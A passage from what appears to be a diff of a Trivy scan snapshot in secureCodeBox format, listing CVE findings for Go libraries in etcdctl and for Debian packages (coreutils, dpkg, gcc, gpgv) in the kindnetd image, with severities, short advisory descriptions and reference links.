--userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://avd.aquasec.com/nvd/cve-2016-2781", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "http://seclists.org/oss-sec/2016/q1/452", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://access.redhat.com/security/cve/CVE-2016-2781", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://lore.kernel.org/patchwork/patch/793178/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-18018", + "installedVersion": "8.30-3", + "packageName": "coreutils", + "references": [ + "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "https://access.redhat.com/security/cve/CVE-2017-18018", + "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "https://www.cve.org/CVERecord?id=CVE-2017-18018", + ], + }, + "category": "Vulnerability", + "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "coreutils: race condition vulnerability in chown and chgrp", + "references": [ { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://avd.aquasec.com/nvd/cve-2017-18018", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://access.redhat.com/security/cve/CVE-2017-18018", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.19.8", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1664", + "installedVersion": "1.19.7", + "packageName": "dpkg", + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "https://security.netapp.com/advisory/ntap-20221007-0002/", + "https://ubuntu.com/security/notices/USN-5446-1", + "https://ubuntu.com/security/notices/USN-5446-2", + ], + }, + "category": "Vulnerability", + "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://avd.aquasec.com/nvd/cve-2022-1664", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5446-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://ubuntu.com/security/notices/USN-5446-2", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-12886", + "installedVersion": "8.3.0-6", + "packageName": "gcc-8-base", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "https://access.redhat.com/security/cve/CVE-2018-12886", + "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "https://www.gnu.org/software/gcc/gcc-8/changes.html", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://avd.aquasec.com/nvd/cve-2018-12886", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://access.redhat.com/security/cve/CVE-2018-12886", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-15847", + "installedVersion": "8.3.0-6", + "packageName": "gcc-8-base", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "https://access.redhat.com/security/cve/CVE-2019-15847", + "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "https://linux.oracle.com/cve/CVE-2019-15847.html", + "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "https://www.cve.org/CVERecord?id=CVE-2019-15847", + ], + }, + "category": "Vulnerability", + "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2019-15847", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://access.redhat.com/security/cve/CVE-2019-15847", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": "2.2.12-1+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-34903", + "installedVersion": "2.2.12-1+deb10u1", + "packageName": "gpgv", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "https://access.redhat.com/errata/RHSA-2022:6602", + "https://access.redhat.com/security/cve/CVE-2022-34903", + "https://bugs.debian.org/1014157", + "https://bugzilla.redhat.com/2102868", + "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "https://dev.gnupg.org/T6027", + "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "https://errata.rockylinux.org/RLSA-2022:6602", + "https://linux.oracle.com/cve/CVE-2022-34903.html", + "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "https://security.netapp.com/advisory/ntap-20220826-0005/", + "https://ubuntu.com/security/notices/USN-5503-1", + "https://ubuntu.com/security/notices/USN-5503-2", + "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "https://www.debian.org/security/2022/dsa-5174", + "https://www.openwall.com/lists/oss-security/2022/06/30/1", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "Signature spoofing via status line injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2022-34903", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://access.redhat.com/errata/RHSA-2022:6602", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://access.redhat.com/security/cve/CVE-2022-34903", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://bugs.debian.org/1014157", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://bugzilla.redhat.com/2102868", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://dev.gnupg.org/T6027", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://errata.rockylinux.org/RLSA-2022:6602", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5503-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://ubuntu.com/security/notices/USN-5503-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5174", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", - "packageName": "golang.org/x/sys", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-14855", + "installedVersion": "2.2.12-1+deb10u1", + "packageName": "gpgv", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/security/cve/CVE-2019-14855", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", + "https://dev.gnupg.org/T4755", + "https://eprint.iacr.org/2020/014.pdf", + "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", + "https://rwc.iacr.org/2020/slides/Leurent.pdf", + "https://ubuntu.com/security/notices/USN-4516-1", + "https://usn.ubuntu.com/4516-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-14855", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm. An attacker could use this weakness to create forged certificate signatures. This issue affects GnuPG versions before 2.2.18.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "gnupg2: OpenPGP Key Certification Forgeries with SHA-1", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - }, - { - "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - }, - { - "type": "URL", - "value": "https://github.com/golang/go/issues/52313", - }, - { - "type": "URL", - "value": "https://go.dev/cl/399539", - }, - { - "type": "URL", - "value": "https://go.dev/cl/400074", - }, - { - "type": "URL", - "value": "https://go.dev/issue/52313", - }, - { - "type": "URL", - "value": "https://groups.google.com/g/golang-announce", - }, - { - "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-14855", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-14855", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://dev.gnupg.org/T4755", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://eprint.iacr.org/2020/014.pdf", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://rwc.iacr.org/2020/slides/Leurent.pdf", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://ubuntu.com/security/notices/USN-4516-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://usn.ubuntu.com/4516-1/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-14855", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3219", + "installedVersion": "2.2.12-1+deb10u1", + "packageName": "gpgv", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - 